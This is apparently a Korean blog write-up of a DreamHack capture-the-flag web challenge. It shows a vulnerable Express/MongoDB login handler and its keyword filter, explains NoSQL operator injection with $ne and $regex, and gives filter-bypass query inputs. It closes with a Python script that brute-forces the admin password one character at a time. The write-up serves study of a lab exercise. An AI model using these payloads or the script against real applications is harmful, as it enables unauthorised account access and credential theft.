728x90
Mongodb로 작성된 사이트이다.
const express = require('express');
const app = express();
const mongoose = require('mongoose');
mongoose.connect('mongodb://localhost/main', { useNewUrlParser: true, useUnifiedTopology: true });
const db = mongoose.connection;
// flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanumeric}'}
const BAN = ['admin', 'dh', 'admi'];
filter = function(data){
const dump = JSON.stringify(data).toLowerCase();
var flag = false;
BAN.forEach(function(word){
if(dump.indexOf(word)!=-1) flag = true;
});
return flag;
}
app.get('/login', function(req, res) {
if(filter(req.query)){
res.send('filter');
return;
}
const {uid, upw} = req.query;
db.collection('user').findOne({
'uid': uid,
'upw': upw,
}, function(err, result){
if (err){
res.send('err');
}else if(result){
res.send(result['uid']);
}else{
res.send('undefined');
}
})
});
app.get('/', function(req, res) {
res.send('/login?uid=guest&upw=guest');
});
app.listen(8000, '0.0.0.0');
MongoDB는 $연산자를 사용하여 injection이 가능하다. 예를들어,
$ne 연산자를 사용해 guest가 나왔다.
여기서는 정규식을 사용 가능하게 하는 $regex를 이용하여 exploit 할것이다.
admin이 필터링 되어있으니 uid[$regex]=ad.in 또는 uid[$regex]n$ 이렇게 우회하고
패스워드가 flag이니 blind sql injection을 이용해주면 금방 구한다.
아래는 exploit 코드이다.
import requests
URL = "http://host3.dreamhack.games:9549"
str = "1234567890abcdefghijklmnopqrstuvwxyz"
isPass = False
flag = "D.{"
while True:
for s in str:
text = flag + s
r = requests.get(f"{URL}/login?uid[$regex]=n$&upw[$regex]={text}")
if "admin" in r.text:
flag += s
print(flag)
isPass = True
break
if isPass:
isPass = False
else:
break
flag += '}'
print(flag)
728x90
반응형
'Web Hacking > DreamHack' 카테고리의 다른 글
[DreamHack] EZ_command_Injection (0) | 2024.04.19 |
---|---|
[DreamHack] Dream Gallery 풀이 (0) | 2024.04.16 |
[Dreamhack] blind sql injection (0) | 2024.04.10 |
[DreamHack] xss-1 풀이 (0) | 2024.04.04 |
드림핵 XSS Filtering Bypass Advanced 풀이 (0) | 2023.12.29 |